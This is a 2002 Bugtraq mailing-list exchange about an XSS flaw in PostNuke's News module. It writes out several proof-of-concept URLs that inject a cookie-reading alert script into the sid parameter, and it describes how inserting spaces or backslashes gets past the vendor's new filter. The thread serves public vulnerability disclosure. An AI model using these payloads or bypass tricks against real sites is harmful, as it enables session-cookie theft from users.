[27292] in bugtraq
Re: Postnuke XSS fixed
daemon@ATHENA.MIT.EDU (Muhammad Faisal Rauf Danka)
Thu Oct 3 23:16:08 2002
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
Date: Wed, 2 Oct 2002 16:24:15 -0700 (PDT)
From: Muhammad Faisal Rauf Danka <mfrd@attitudex.com>
To: Daniel Woods <dwoods@ucalgary.ca>
Reply-To: mfrd@attitudex.com
Message-Id: <20021002232415.CC1383986@sitemail.everyone.net>
I just checked it again :
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
where + denotes a blank space or similarly this one:
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script%20>alert(document.cookie);</script>
resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg.
However the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
or any character inserted before first "script" and after first less than "<" resulting in DB Error, revealing nothing (user/pass/path etc).
But I used I.E and Netscape, maybe it's different with other browsers. :)
Regards
--------
Muhammad Faisal Rauf Danka
Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B
784B 0202
--- Daniel Woods <dwoods@ucalgary.ca> wrote:
>
>Humm!
>
>> on 26th Sep the following url:
>> http://news.postnuke.com/modules.php
>> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work Keep it up! :)
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
> http://news.postnuke.com/modules.php
> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
>Using the request...
> ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
>gives me the DB Error: message
>
>And using the request...
> ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
>gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
>
>Thanks... Dan.
_____________________________________________________________
---------------------------
[ATTITUDEX.COM]
http://www.attitudex.com/
---------------------------
_____________________________________________________________
Select your own custom email address for FREE! Get you@yourchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
